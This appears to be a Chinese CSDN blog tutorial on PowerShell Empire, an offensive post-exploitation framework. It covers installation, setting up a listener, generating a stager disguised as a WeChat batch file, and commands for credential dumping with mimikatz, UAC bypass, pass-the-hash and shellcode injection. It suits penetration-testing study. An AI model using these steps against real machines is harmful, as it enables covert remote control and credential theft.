我的内网渗透-Empire基本操作

最新推荐文章于 2024-05-17 13:48:31 发布
最新推荐文章于 2024-05-17 13:48:31 发布
阅读量89 收藏
点赞数
文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1825819493/article/details/131262400
版权

简介

Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。

安装

正常情况下

apt-get(具有一定的成功率)

#########################################
新版的不用安装,默认已经安装好了


#########################################
旧版的需要进行手动安装

sudo apt-get update  
#更新库

sudo apt-get install powershell-empire -y  
#安装


###########################
要先打开服务端,在打开客户端

sudo powershell-empire server
#打开empire的服务端
sudo powershell-empire client
#打开客户端,自动连接服务端

apt不行的情况下

github克隆

git clone --recursive https://github.com.cnpmjs.org/BC-SECURITY/Empire.git   
#下载Empire(可能会网络不稳定)
	
cd Empire

#PIP3安装
wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
	
pip install -r requirements.txt  -i https://pypi.douban.com/simple  
#批量安装所需要的Python模块
    M2Crypto报错-》sudo apt install libssl-dev swig  
    # 安装依赖项

sudo ./setup/install.sh   (KALI源不换会很慢)
		vim /etc/apt/sources.list
		deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
		deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
	
pip install poetry (可选)
	
sudo poetry install    
#poetry是Python中用于依赖项管理和打包的工具(可选)
	
sudo poetry run python empire (可选)
	
./Empire/setup/reset.sh   
#重置empire
	
./empire  或 python3 empire 
#运行empire

github下载官网:

https://github.com/BC-SECURITY/Empire/

官方文档(很久没更新,具体使用还得自己研究)

http://www.powershellempire.com/

使用流程

 

监听

(Empire) > uselistener http 
#打开监听模块

(Empire: listeners/http) > info 
#查看当前模块信息

(Empire: uselistener/http) > options
#查看当前模块的配置信息(true的就是需要进行配置的设置)
	

#设置参数:Name、Port、HOST  (这里注意要区分大小写)
set Name L1
set Port 2222
set HOST 192.168.31.24

(Empire: listeners/http) > execute 
#执行监听模块

 

生成stager

(Empire: listeners) > usestager windows/launcher_bat 
#使用launcher_bat模块生成payload
#这个模块目前好像是不生效的,改用windows/hta模块实测有效(不开windows防护可连接,开防护连接不上)

(Empire: stager/windows/launcher_bat) > options   
#查看参数

(Empire: stager/windows/launcher_bat) > set Listener L1  
#匹配监听器(监听器名称)

(Empire: stager/windows/launcher_bat) > set OutFile /root/Desktop/WEIXIN.bat    
#设置输出文件的存放位置和文件名(发现你路径不管设置什么,最终生成的位置都是固定的)

客户端下载执行stager

Active agents: 如果agents是绿色的, 代表是存活的;如果是红色, 那就是掉线的状态.

###########################################
在目标主机下载运行之后,在我们的控制面版会提示:[+] New agent 7FMR6XES checked in,这时候就可以查看下会话连接情况
(Empire: usestager/windows_hta) > agents
#查看连接的会话列表

(Empire)> 模式命令

help = ?       帮助命令
agents          查看代理,进入用户菜单
creds           存放用户的凭据信息 (前提是获取到mimikatz的HASH值)
interact        进入到交互模式
list            列出存活的代理或者监听器
searchmodule    搜索模块
set             设置参数
show            显示参数
uselistener     使用监听器(创建)
usemodule       使用模块
listeners       监听模块
kail   id/all   杀死进程
remove id/all   清除代理

 

interact(shell)命令

可以用help查看可以使用的命令

interact --> 进入到交互模式
kill	 --> 杀死会话
killdate --> 指定日期杀死会话 killdate [agent/all] 01/01/2016
rename	 --> 给agents重命名
searchmodule --> 搜索模块
bypassuac + 监听进程名--> bypassuac提权
jobs      --> 查看工作中的任务
ps        -->获取进程
mimikatz  --> 前提:提权。抓取账号密码(hashdump)
creds     --> 查看账号密码
psinject  --> 利用shellcode进程迁移
pth 	  --> pass the hash
shell + cmd命令 --> 用cmd执行指令
sysinfo   --> 获取系统基本信息
spawn     --> 生成新的agent
	(Empire: 1) > spawn $Listenname
sc          --> 截屏
injectshellcode --> 利用shellcode进程迁移到meterpreter
bypassuac --> 在windows10中失效


 

偷吃"游"的阿彪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
网络渗透测试基础之帝国empire
m0_65369792的博客
05-19 273
一. ​Empire介绍 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 二.
渗透神器Empire安装和简单使用
hl1293348082的专栏
04-09 1844
1. Empire简介 官网介绍如下: Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable
Empire内网渗透工具简单使用
yangbz123的博客
04-24 1998
文章目录工具介绍下载地址功能介绍设置监听生成木马后门1、Windows launcher_bat批处理脚本木马2、Windows dll动态链接文件木马3、Windows launcher_vbs 脚本木马4、Windows powershell payload脚本上线5、Windows macro(office宏)木马6、linux bash payload脚本上线Agent上线Interact 切换agents常用参数参考文献 工具介绍 Empire是一款强大的Powershell脚本利用框架,类似于M
Empire域渗透神器
weixin_43749601的博客
03-23 754
安装 git命令下载 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装Empire cd Empire cd setup sudo ./install.sh 但是会出现报错 Traceback (most recent call last): File "./empire", line 13, in <module> from lib.common import empire, helpers
渗透神器Empire的简单使用
weixin_30279751的博客
03-16 1781
1、安装 1.1、系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2、安装命令: 安装最后需要输入用户名、密码 wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip unzip Empire-master.zip cd Empire-m...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
vms-empire:设置为BBS门的VMS-Empire版本-开源
04-29
设置为BBS门的VMS-Empire版本。 完全支持游戏保存,因此不必坐一会儿就可以玩...
goodgame-empire-api
03-17
Goodgame-Empire-api 用于公开数据库中数据存储并在将来的其他应用程序中使用的API。 部署 服务器设置为侦听端口3000。 指令 运行nodemon:npm运行开发 运行应用程序:node src / index.js 用 表示 MySQL的 路线 ...
Phoenix-Hierarchy-Empire
04-07
凤凰网 ... #I PhoenixDOM API客户端允许浏览器和Node.js客户端与PhoenixDOM API进行交互。 它包括以下核心组件。 钱包-加密功能,例如生成钱包,私钥或地址。 kms-与PhoenixDOM通信的API调用集。...
khmer-empire
05-18
#by HeaLOng。
渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
14、域渗透神器Empire安装和简单使用
Fly_鹏程万里
06-14 6610
1. Empire简介Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents withou...
powershell-empire做内网主机信息收集
u013930899的博客
05-29 503
目录 一、empire内网主机信息收集 二、实现步骤 1.启动监听器 2.制作launcher_bat木马 3.连接被控机 4.内网信息收集 4.1.查看本地用户、域组信息等 4.2.主机存活探测 4.3.端口扫描 4.4.收集用户信息 总结 一、empire内网主机信息收集 empire提供了用于收集主机信息的模块,使用三个模块的situational_awareness信息收集模块,可以主机存活探测、端口扫描、收集用户信息、定位域管理员、查看本机用户、域...
全!Empire的基本使用和域渗透
Appleteachers的博客
05-06 1252
一、Empire简介 ​ Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 ​ Emp
empire用法笔记
发哥微课堂
02-28 4468
0x00:简介 empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的免杀效果。结合 msf 使用更是如虎添翼。empire 安装下载命令如下: git clone https://github.com/EmpireProjec...
【问题实操】银河高级服务器操作系统实例分享,某信息系统服务器宕机处理
银河麒麟操作系统的博客
05-17 1003
【问题实操】银河高级服务器操作系统实例分享,某信息系统服务器宕机处理。
Linux repo包安装Nginx
weixin_43485737的博客
05-14 353
一般Nginx默认是安装在/etc/nginx 目录。
服务器CPU满载100%怎么处理
最新发布
m0_70754056的博客
05-17 206
CC是通过IP频繁的发起访问,可以通过命令或在查看日志查看到一些IP,就可以在IIS中设置屏蔽该IP对Web站点的访问,从而缓解CC攻击的压力。随着网络信息化的发展,服务器给企业服务商们带来非常多的便利,但与此同时在服务器的管理和维护上也令众多服务商们头疼不已,尤其当服务器在长时间的运行状态上,卡顿是最常见的问题,CPU满载是卡顿最常见的原因之一,那么遇到服务器CPU满载100%怎么办?2、程序占用导致的CPU满载,可以升级更高的硬件配置来解决,或者也是可以另购一台机器,将业务分摊到两台机器上,进行使用。
【MySQL精通之路】MySQL 8.0中添加、弃用或删除的服务器和状态变量及选项
Anakki的博客
05-16 316
欢迎大家关注专栏或者关注收藏我1.Mysql精通之路专栏: http://t.csdnimg.cn/4Rqp72.大家可以从这篇博客开始读,他是所有博客的根节点:【MySQL精通之路】详读MySQL8.0官方文档-CSDN博客MySQL 8.0中添加了以下系统变量、状态变量和服务器选项。 MySQL 8.0中删除了以下系统变量、状态变量和选项。
通过list<Empire*>::iterator访问Empire的成员
06-11
可以通过迭代器(*iterator)来访问Empire的成员,然后使用成员访问运算符(.)或箭头运算符(->)来访问Empire的成员变量或成员函数。 以下是一个示例代码: ```c++ #include <iostream> #include <list> using namespace std; class Empire { public: Empire(int id, const QString& name) : m_id(id), m_name(name) {} void printInfo() { cout << "Empire ID: " << m_id << ", Name: " << m_name.toStdString() << endl; } private: int m_id; QString m_name; }; int main() { list<Empire*> empireList; empireList.push_back(new Empire(1, "Empire 1")); empireList.push_back(new Empire(2, "Empire 2")); // 使用迭代器访问Empire的成员 for (list<Empire*>::iterator it = empireList.begin(); it != empireList.end(); ++it) { // 访问Empire的成员变量 cout << "Empire ID: " << (*it)->m_id << ", Name: " << (*it)->m_name.toStdString() << endl; // 调用Empire的成员函数 (*it)->printInfo(); } // 释放内存 for (list<Empire*>::iterator it = empireList.begin(); it != empireList.end(); ++it) { delete *it; } empireList.clear(); return 0; } ``` 以上代码创建了一个Empire指针的列表,然后使用迭代器访问列表中的Empire对象。在迭代器访问Empire指针时,需要使用箭头运算符(->)来访问Empire对象的成员变量和成员函数。注意要遍历完列表后,释放Empire对象的内存。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值